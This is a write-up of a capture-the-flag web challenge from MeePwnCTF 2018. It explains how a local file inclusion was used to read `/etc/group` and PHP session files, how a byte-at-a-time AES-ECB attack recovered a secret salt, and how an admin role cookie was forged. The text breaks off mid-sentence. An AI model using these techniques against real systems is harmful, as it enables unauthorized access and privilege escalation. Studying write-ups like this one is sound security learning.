Rating: 5.0

# Mapl Story

Mapl Story was part of the MeePwnCTF Quals 2018 and consists of a webpage where you can name a
"character" and train a pet a command. You get the code but the config is censored.

## Have a look around

First of let's create an account, e.g. foobar@example.org/foobar123, set any name, we'll change that later.

Sign in and have a look at your cookies, you'll see your PHPSESSID and a `_role`.
`_role` is generated using either `sha256("admin".$salt)` or (in this case) `sha256("user".$salt)`.
We need the salt to continue here.

Have a look around the few pages on the site. The game page is completely irrelevant, just a gimmick.

## File inclusion vulnerability

There is a file inclusion vulnerability in index.php, so have a look at e.g. `/index.php?page=/etc/group`.
Unfortunately it uses a GET variable which is heavily escaped so for now there isn't really much we can
directly do with this bug.

## Let's get salty

Let's have a look at `/index.php?page=/var/lib/php/sessions/sess_PHPSESSID` (replace PHPSESSID).

You'll see a variable called `character_name`.
`character_name` is AES-128-ECB encrypted data using `openssl_encrypt($data.$salt,"AES-128-ECB",$key)`.
Since AES-128-ECB is working on 16-byte blocks and we control the start of the string (it's the character name you
can update on your settings page!) we can attack it by brute-forcing byte by byte.

We start of setting a character name like `AAAAAAAAAAAAAAA` (15x'A') and we'll look at the first 32 characters
of the hash in the session file, now we start trying printable characters at the 16. position, we'll find a hash
match at `AAAAAAAAAAAAAAAm` so we now the salt starts with `m`. Next we do the same thing with
`AAAAAAAAAAAAAA` (14x'A') and will get the hash and try characters again, the next match will be `AAAAAAAAAAAAAAms`.

We'll continue this until we finally get the salt: `ms_g00d_0ld_g4m3`.

## Becoming admin

Becoming admin now is as simple as writing the result of `sha256("admin"."ms_g00d_0ld_g4m3")` into our `_role`
cookie. After refreshing the page you'll see the admin link appearing in the navigation bar.

`sha256("admin"."ms_g00d_0ld_g4m3") => a2ae9db7fd12a8911be74590b99bc7ad1f2f6ccd2e68e44afbf1280349205054`

## Give yourself a pet

In the admin menu you have to give yourself a pet. This will allow you to train it commands on the character
page, which is just writing a text-file under `"uploads/".md5($salt.$email)."/command.txt`.
A lot of characters are filtered and you can only write 19 characters, so you can't really do much with this
alone.

19 characters is just barely long enough to fit a base64-encoded ```

Original writeup (http://blog.redrocket.club/2018/07/15/meepwn-quals-2018-maplstory/).